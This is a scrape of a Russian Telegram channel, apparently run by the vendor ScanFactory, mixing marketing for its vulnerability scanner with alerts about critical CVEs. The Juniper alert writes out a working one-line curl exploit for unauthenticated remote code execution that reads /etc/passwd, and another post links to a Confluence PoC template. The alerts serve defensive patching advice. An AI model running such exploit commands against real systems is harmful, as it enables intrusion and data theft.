Forwarded from Управление Уязвимостями и прочее
ScanFactory проведут вебинар 27 сентября. Это один из топовых российских сервисов для сканирования периметра на уязвимости, т.е. EASM или СДУСП.
Обещают рассказать:
🔻 Какие сканеры они поддерживают (их фишка это использование и объединение результатов из множества готовых движков, включая, кстати, Nessus и BurpSuite 😉)
🔻 Как они делают ручную верификацию уязвимостей (в рамках доп. сервиса)
🔻 Как у них работают нотификации в телеграмм
🔻 Какие критические уязвимости они находили у клиентов
🔻 Как они планируют развивать продукт до 2025 года
Рассказывать будет основатель ScanFactory Владимир Иванов. Крутой парень, знаком с ним. Он тоже бывший PT-шник, был тимлидом пентестеров. Вебинар собираюсь заслушать. Тех, кто темой периметрового сканирования интересуется, тоже приглашаю зарегаться.
@avleonovrus #ScanFactory #EASM #webinar
Обещают рассказать:
🔻 Какие сканеры они поддерживают (их фишка это использование и объединение результатов из множества готовых движков, включая, кстати, Nessus и BurpSuite 😉)
🔻 Как они делают ручную верификацию уязвимостей (в рамках доп. сервиса)
🔻 Как у них работают нотификации в телеграмм
🔻 Какие критические уязвимости они находили у клиентов
🔻 Как они планируют развивать продукт до 2025 года
Рассказывать будет основатель ScanFactory Владимир Иванов. Крутой парень, знаком с ним. Он тоже бывший PT-шник, был тимлидом пентестеров. Вебинар собираюсь заслушать. Тех, кто темой периметрового сканирования интересуется, тоже приглашаю зарегаться.
@avleonovrus #ScanFactory #EASM #webinar
🔥6❤3⚡1
Уязвимость в Juniper, которые вендор отметил как "Medium", оказалась "Critical"
Предыстория: 28 августа эксплоит впервые опубликовала компания watchtowr. Массовая атака устройств была затруднена тем, что созданный эксплоит работал не на всех системах.
18 сентября (вчера) опубликовали универсальный 1-line RCE без авторизации для атаки этих устройств, с помощью 1 команды curl:
Рекомендуется обновить устройства, или отключить публичный доступ к этому веб-интерфейсу.
@scanfactory CVE-2023-36844 #juniper
Предыстория: 28 августа эксплоит впервые опубликовала компания watchtowr. Массовая атака устройств была затруднена тем, что созданный эксплоит работал не на всех системах.
18 сентября (вчера) опубликовали универсальный 1-line RCE без авторизации для атаки этих устройств, с помощью 1 команды curl:
curl -ik "https://IP/" -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0' --ciphers DEFAULT@SECLEVEL=1
По оценкам shodan и netlas, на Российских IP публично-доступны ~300 единиц этого оборудования (и ~18000 единиц всего в мире). По оценкам автора статьи, ~80% устройств в мире остаются не запатчены.Рекомендуется обновить устройства, или отключить публичный доступ к этому веб-интерфейсу.
@scanfactory CVE-2023-36844 #juniper
👍6🔥2⚡1
А вот как выглядят атаки на цепочку поставок
Сегодня опубликовали PoC на
В первую очередь пострадают компании по ИТ-аутсорсу, тк как правило они размещают системы хранения кода на периметре, и редко их обновляют.
Если у вас используется TeamCity - обновляйтесь до версии
@scanfactory CVE-2023-42793 #jetbrains #teamcity
Сегодня опубликовали PoC на
JetBrains TeamCity < 2023.05.4 - Remote Code Execution. Подтверждаем, что эксплоит рабочий. В РФ замечено ~300 хостов (и ~4000 хостов в мире). С момента публикации CVE до публикации эксплоита прошло 9 дней.В первую очередь пострадают компании по ИТ-аутсорсу, тк как правило они размещают системы хранения кода на периметре, и редко их обновляют.
Если у вас используется TeamCity - обновляйтесь до версии
2023.05.4@scanfactory CVE-2023-42793 #jetbrains #teamcity
🔥4⚡2👍2
3 часа назад выложили nuclei template для RCE в Confluence (CVSS: 10.0)
Уязвимы версии 8.0.*-8.5.3
PoC: https://github.com/projectdiscovery/nuclei-templates/pull/8982/files
Блог: https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/
PS: Видим, что один российский иб-вендор не успел запатчиться... Год будет жаркий
@scanfactory #confluence CVE-2023-22527
Уязвимы версии 8.0.*-8.5.3
PoC: https://github.com/projectdiscovery/nuclei-templates/pull/8982/files
Блог: https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/
PS: Видим, что один российский иб-вендор не успел запатчиться... Год будет жаркий
@scanfactory #confluence CVE-2023-22527
🔥10⚡2
Forwarded from SECURITM
Добавлена интеграция 🛡 с ScanFactory
Сканфэктори это набирающий популярность отечественный сканер периметра.
Теперь в🛡 SECURITM сведения о проблемах и уязвимостях периметра можно добавить к модулю #VM (Vulnerability Management), объединив с отчетами от инфраструктурных сканеров, сканеров веб-приложений и сканеров безопасности кода.
Провести приоритезацию по методике ФСТЭК, поставить задачи на устранение, собрать аналитику и отчетность по процессу.
Сканфэктори это набирающий популярность отечественный сканер периметра.
Теперь в
Провести приоритезацию по методике ФСТЭК, поставить задачи на устранение, собрать аналитику и отчетность по процессу.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8⚡4🙏3
Уязвимые версии SSH: 8.5p1 - 9.7p1
Первые эксплоиты появились на Github (работоспособность мы ещё не проверяли)
Подробнее: https://www.qualys.com/regresshion-cve-2024-6387/
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5❤3👍1
ScanFactory VM – новое поколение платформ управления уязвимостями для российского рынка.
После ухода ведущих западных поставщиков класса VM, на российском рынке отсутствовало зрелое и удобное решение, которое бы закрыло потребности заказчиков в инструментарии управления уязвимостями.
ScanFactory VM - первая в России платформа, которая объединяет возможности ведущих сканеров уязвимостей в рамках "одного окна", обеспечивая полный охват внутренней инфраструктуры и внешнего периметра специализированными инструментами.
Что делает ScanFactory VM уникальной?
1. Использование баз данных уязвимостей сразу нескольких вендоров обеспечивает максимальный уровень покрытия уязвимостей на российском рынке.
2. "Единое окно" для управления уязвимостями внутренней инфраструктуры и внешнего периметра.
3. Двусторонняя интеграция с SGRC SECURITM – готовое решение для автоматизации VM-процессов.
4. Установка On-Premise, обновления каждые 12 часов.
5. Установка на Российские ОС.
Присоединяйтесь к нашему вебинару, и вы увидите, как «в пару кликов» построить процесс VM, который будет работать с минимальным участием отдела ИБ.
📅 31 октября 16:00
➡️ Зарегистрироваться
PS: Чтобы получить PDF с описанием On-Premise архитектуры продукта ДО вебинара, напишите с рабочей почты на info@sf-cloud.ru
После ухода ведущих западных поставщиков класса VM, на российском рынке отсутствовало зрелое и удобное решение, которое бы закрыло потребности заказчиков в инструментарии управления уязвимостями.
ScanFactory VM - первая в России платформа, которая объединяет возможности ведущих сканеров уязвимостей в рамках "одного окна", обеспечивая полный охват внутренней инфраструктуры и внешнего периметра специализированными инструментами.
Что делает ScanFactory VM уникальной?
1. Использование баз данных уязвимостей сразу нескольких вендоров обеспечивает максимальный уровень покрытия уязвимостей на российском рынке.
2. "Единое окно" для управления уязвимостями внутренней инфраструктуры и внешнего периметра.
3. Двусторонняя интеграция с SGRC SECURITM – готовое решение для автоматизации VM-процессов.
4. Установка On-Premise, обновления каждые 12 часов.
5. Установка на Российские ОС.
Присоединяйтесь к нашему вебинару, и вы увидите, как «в пару кликов» построить процесс VM, который будет работать с минимальным участием отдела ИБ.
📅 31 октября 16:00
➡️ Зарегистрироваться
PS: Чтобы получить PDF с описанием On-Premise архитектуры продукта ДО вебинара, напишите с рабочей почты на info@sf-cloud.ru
🔥12❤8👍1👀1
Forwarded from Управление Уязвимостями и прочее
ScanFactory: преображение из EASM-а в Vulnerability Management решение. Примерно год назад смотрел вебинар ScanFactory на котором Владимир Иванов, среди прочего, рассказывал про возможность on-prem установки EASM решения. Я тогда предположил, что это может быть первым шагом к сканированию внутренней инфры BlackBox-ом.
Угадал. 🙂 Сейчас ScanFactory как раз это и презентуют. Причём в большем объеме. Будет не только BlackBox, а полноценный VM со сканированием активов с аутентификацией.
❓ Почему именно ScanFactory первым из российских EASM вендоров делает переход в сторону VM-а?
➡️ Решение исторически развивается как оркестратор над множеством (19) готовых сканирующих движков. Как опенсурсных, так и коммерческих. За сканирование с аутентификацией будет отвечать лицензированный движок (и контент) коммерческого сканера уязвимостей на букву N. 😉 Что снимает вопросы по функциональным возможностям. 😏
Подробности о ScanFactory VM можно будет узнать на вебинаре 31 октября.
@avleonovrus #ScanFactory #ScanFactoryVM
Угадал. 🙂 Сейчас ScanFactory как раз это и презентуют. Причём в большем объеме. Будет не только BlackBox, а полноценный VM со сканированием активов с аутентификацией.
❓ Почему именно ScanFactory первым из российских EASM вендоров делает переход в сторону VM-а?
➡️ Решение исторически развивается как оркестратор над множеством (19) готовых сканирующих движков. Как опенсурсных, так и коммерческих. За сканирование с аутентификацией будет отвечать лицензированный движок (и контент) коммерческого сканера уязвимостей на букву N. 😉 Что снимает вопросы по функциональным возможностям. 😏
Подробности о ScanFactory VM можно будет узнать на вебинаре 31 октября.
@avleonovrus #ScanFactory #ScanFactoryVM
🔥12👍8⚡6
Презентация ScanFactory VM On-Premise.pdf
2.8 MB
Коллеги, спасибо, что посетили наше мероприятие!
Как и обещали, высылаем презентацию с вебинара🐟
Видеозапись Вы можете получить, написав нам на почту:
info@sf-cloud.ru
Как и обещали, высылаем презентацию с вебинара
Видеозапись Вы можете получить, написав нам на почту:
info@sf-cloud.ru
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍8⚡7🤔1
Forwarded from Видеоканал Global Digital Space
Новый эпизод подкаста:
Рынок уязвимостей | сканеры уязвимостей | Эпизод 5
Собрались как-то в
Модератор:
Спикеры:
А что из этого вышло? Смотрите сами!
Полезные ссылки:
Positive Technologies
ScanFactory
CICADA8
Управление уязвимостями и прочее
Информационная Опасность
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16❤9👍7
🚀 Axoft стал дистрибутором платформы ScanFactory.
Друзья, у нас отличные новости!
Мы рады сообщить вам, что заключили партнёрский договор с AXOFT на дистрибуцию нашего решения!
AXOFT – крупнейший российский дистрибьютор, сосредоточится на расширении пула партнеров и их заказчиков
ScanFactory – платформа по защите периметра (EASM), и внутренней инфраструктуры (VM) из "одного окна"
Это не только начало мощного партнерства, которое объединит экспертизу двух компаний для совместного роста и взаимовыгодного сотрудничества, но и важный шаг, который открывает новые возможности для развития и укрепления нашего присутствия на рынке.
🔒 Что предлагает ScanFactory?
• Инвентаризация активов
• Поиск и устранение уязвимостей
• Уведомления об изменениях на защищаемых активах
• Визуализация результатов и создание отчетов
💼 Кто уже использует?
Сбербанк, Ozon, Магнит, beeline cloud, и другие.
Решение внесено в реестр российского ПО.
📈 Почему мы лучшие?
• Ежедневные обновления баз данных уязвимостей
• Интеграции с ведущими вендорами
• Экспертное сопровождение и услуги по ручной верификации результатов
Благодаря этому партнерству, российские компании получат доступ к надежному и качественному решению для защиты своих активов!
Источник
@AxoftOnAir @ScanFactory
Друзья, у нас отличные новости!
Мы рады сообщить вам, что заключили партнёрский договор с AXOFT на дистрибуцию нашего решения!
AXOFT – крупнейший российский дистрибьютор, сосредоточится на расширении пула партнеров и их заказчиков
ScanFactory – платформа по защите периметра (EASM), и внутренней инфраструктуры (VM) из "одного окна"
Это не только начало мощного партнерства, которое объединит экспертизу двух компаний для совместного роста и взаимовыгодного сотрудничества, но и важный шаг, который открывает новые возможности для развития и укрепления нашего присутствия на рынке.
🔒 Что предлагает ScanFactory?
• Инвентаризация активов
• Поиск и устранение уязвимостей
• Уведомления об изменениях на защищаемых активах
• Визуализация результатов и создание отчетов
💼 Кто уже использует?
Сбербанк, Ozon, Магнит, beeline cloud, и другие.
Решение внесено в реестр российского ПО.
📈 Почему мы лучшие?
• Ежедневные обновления баз данных уязвимостей
• Интеграции с ведущими вендорами
• Экспертное сопровождение и услуги по ручной верификации результатов
Благодаря этому партнерству, российские компании получат доступ к надежному и качественному решению для защиты своих активов!
Источник
@AxoftOnAir @ScanFactory
🔥11⚡7🍾5🏆2❤1
This media is not supported in your browser
VIEW IN TELEGRAM
🎥 Видеопрезентация ScanFactory VM 🤩
🚨 Заменить текущее VM-решение, чтобы повысить реальный уровень защищённости, и сэкономить бюджет? Легко!
🎉 Представляем ScanFactory VM — мультивендорное решение для управления внешними и внутренними угрозами в режиме "одного окна".
⭐️ Почему ScanFactory VM?
🏅 Под капотом — лидеры мирового рынка по детектированию уязвимостей в инфраструктуре, и веб-приложениях.
🗂 Крупнейшая база CVE: Самая большая база уязвимостей в России.
🎛 Гибкость: Сканирование локальной сети "белым ящиком", веб-приложений, платные источники данных, и многое другое.
👍🏻 Удобство: Понятный дашборд, API для интеграции, и даже Telegram-бот для оповещений.
⚖️ Доступность: Работает как в нашем облаке (SaaS), так и на ваших мощностях (on-premise).
🫰 И главное - всё это и даже больше с понятным ценообразованием!
🚀 Хотите попробовать?
Записывайтесь на бесплатный пилот и убедитесь сами, как ScanFactory VM стратегически усилит вашу кибербезопасность!
📺 Смотрите видео-презентацию и делитесь с коллегами.
💬 Есть вопросы, хотите получить дополнительные материалы?
Телеграм: @arsenk0ndr
Почта: info@sf-cloud.ru
#Кибербезопасность #ScanFactory #ScanFactoryVM #Уязвимости #SaaS #OnPremise
P.S. Не забудьте сохранить пост, чтобы не потерять! 😉
🚨 Заменить текущее VM-решение, чтобы повысить реальный уровень защищённости, и сэкономить бюджет? Легко!
🎉 Представляем ScanFactory VM — мультивендорное решение для управления внешними и внутренними угрозами в режиме "одного окна".
⭐️ Почему ScanFactory VM?
🏅 Под капотом — лидеры мирового рынка по детектированию уязвимостей в инфраструктуре, и веб-приложениях.
🗂 Крупнейшая база CVE: Самая большая база уязвимостей в России.
🎛 Гибкость: Сканирование локальной сети "белым ящиком", веб-приложений, платные источники данных, и многое другое.
👍🏻 Удобство: Понятный дашборд, API для интеграции, и даже Telegram-бот для оповещений.
⚖️ Доступность: Работает как в нашем облаке (SaaS), так и на ваших мощностях (on-premise).
🫰 И главное - всё это и даже больше с понятным ценообразованием!
🚀 Хотите попробовать?
Записывайтесь на бесплатный пилот и убедитесь сами, как ScanFactory VM стратегически усилит вашу кибербезопасность!
📺 Смотрите видео-презентацию и делитесь с коллегами.
💬 Есть вопросы, хотите получить дополнительные материалы?
Телеграм: @arsenk0ndr
Почта: info@sf-cloud.ru
#Кибербезопасность #ScanFactory #ScanFactoryVM #Уязвимости #SaaS #OnPremise
P.S. Не забудьте сохранить пост, чтобы не потерять! 😉
🔥16⚡10👍10❤2
На CISOCLUB вышел обзор нашей платформы для анализа защищенности.
Из него вы узнаете, как решение помогает управлять уязвимостями на внешнем (EASM) и внутреннем (VM) периметре, и предотвращать утечки паролей для комплексной защиты вашего бизнеса.
В обзоре:
@scanfactory
Please open Telegram to view this post
VIEW IN TELEGRAM
CISOCLUB
ScanFactory: единое решение для закрытия уязвимостей на внешнем периметре, и внутренней инфраструктуре
Ищете эффективные методы защиты своей ИТ-инфраструктуры? Узнайте о ScanFactory и его уникальных возможностях!
👍12❤9⚡9🔥5
Теперь вы можете сканировать из облака ScanFactory не только ресурсы на периметре, но и те, что находятся в изолированных корпоративных средах.
В чем преимущества?
Теперь нет необходимости в сложных и дорогих установках — достаточно просто подключить Remote Scan Agent.
Перед публикацией активов вы сможете автоматизировать сканирование, повышая эффективность и минимизируя риски.
Забудьте о дополнительных сканирующих нодах в On-Premise — теперь все можно делать через Remote Scan Agent.
Если у вас MSSP-версия, с помощью RSA вы сможете сканировать сразу несколько тенантов из своего личного кабинета.
Узнать больше.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6👍6⚡5
В ScanFactory VM обновился интерфейс — теперь запуск сканирований, анализ отчетов и использование инструментов платформы стали еще удобнее.
Обновленный дизайн делает взаимодействие с платформой максимально комфортным.
Запросить демо.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17👍10⚡4💅3❤2
Управление уязвимостями (VM) – это не просто сканирование, а полный цикл работ: выявление, анализ, приоритизация, устранение и контроль.
Двусторонняя интеграция ScanFactory VM и Securitm SGRC позволяет автоматизировать этот процесс и сделать его прозрачным.
Как это работает?
После интеграции SGRC автоматически получает данные о найденных уязвимостях из ScanFactory VM и:
Полезные ссылки:
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡7❤🔥4🔥4
В ScanFactory VM (On-Premise) сканирование внутренней сети с авторизацией работает в безагентском режиме.
Как это работает?
Попробовать бесплатно.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍5❤4👏2🤡1
Вебинар ScanFactory VM: спроектирован для Large Enterprise
Компании уровня Large Enterprise (с инфраструктурой в десятки тысяч хостов) предъявляют повышенные требования к архитектуре, безопасности, отказоустойчивости и документации внедряемых VM-систем.
Российское решение ScanFactory воплощает концепцию «мультивендорного сканера безопасности», которое в режиме «одного окна» закрывает потребности самых требовательных заказчиков по направлениям VM, EASM, DAST, и в рабочем режиме сканирует более 80 000 хостов на собственном ПАК.
Когда: 23 апреля, 11:00 (МСК)
Спикер: Владимир Иванов, основатель ScanFactory
На вебинаре обсудим:
⚫️ Преимущества поставки ScanFactory VM в формате ПАК (программно-аппаратный комплекс)
⚫️ Deep dive в архитектуру, гибкость внедрения в гео-распределенные инфраструктуры, и безопасность продукта
⚫️ Отличия ScanFactory VM от существующих на российском рынке решений
⚫️ Ответим на ваши вопросы
👨💻Кому будет полезно:
CISO, Blue/Purple/Red Team-экспертам, техническим лидам по ИБ и всем, кто отвечает за кибербезопасность в компаниях.
👉 Регистрируйтесь.
Компании уровня Large Enterprise (с инфраструктурой в десятки тысяч хостов) предъявляют повышенные требования к архитектуре, безопасности, отказоустойчивости и документации внедряемых VM-систем.
Российское решение ScanFactory воплощает концепцию «мультивендорного сканера безопасности», которое в режиме «одного окна» закрывает потребности самых требовательных заказчиков по направлениям VM, EASM, DAST, и в рабочем режиме сканирует более 80 000 хостов на собственном ПАК.
Когда: 23 апреля, 11:00 (МСК)
Спикер: Владимир Иванов, основатель ScanFactory
На вебинаре обсудим:
👨💻Кому будет полезно:
CISO, Blue/Purple/Red Team-экспертам, техническим лидам по ИБ и всем, кто отвечает за кибербезопасность в компаниях.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥6❤4
9 апреля в эфире AM Live эксперты обсудят лучшие практики Vulnerability Management. От нас выступит Владимир Иванов, основатель ScanFactory.
Спикеры разберут:
Please open Telegram to view this post
VIEW IN TELEGRAM
AM Live
Лучшие практики Vulnerability Management - AM Live
👍7❤4🔥4
Мультитенантность и авторизация в ScanFactory VM
В управлении уязвимостями важны не только сканеры, но и контроль над доступом. В ScanFactory VM реализована гибкая система разграничения прав.
👉 Мультитенантность
В архитектуре ScanFactory VM каждый заказчик имеет изолированный личный кабинет (тенант) с собственной сканирующей нодой. Таким образом, сканирование одного заказчика не мешает другому, а результаты сканирования зашифрованы уникальным ключом тенанта.
👉 Авторизация
Поддержка локальных учетных записей с 2FA, интеграции с SSO и LDAP.
Роли пользователей:
⚫️ Администратор – полный контроль над платформой, настройка пользователей и проектов.
⚫️ Аналитик– управление уязвимостями в рамках разрешённых проектов.
⚫️ Только чтение – только просмотр информации.
Итоговые преимущества
1⃣ Отказоустойчивость – высокая производительность при работе с несколькими тенантами.
2⃣ Безопасность – минимизация рисков за счёт сетевых политик, изоляции и шифрования.
3⃣ Гранулярный доступ – каждый пользователь получает ровно тот уровень доступа, который ему необходим.
В управлении уязвимостями важны не только сканеры, но и контроль над доступом. В ScanFactory VM реализована гибкая система разграничения прав.
В архитектуре ScanFactory VM каждый заказчик имеет изолированный личный кабинет (тенант) с собственной сканирующей нодой. Таким образом, сканирование одного заказчика не мешает другому, а результаты сканирования зашифрованы уникальным ключом тенанта.
Поддержка локальных учетных записей с 2FA, интеграции с SSO и LDAP.
Роли пользователей:
Итоговые преимущества
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👏6👍5👻4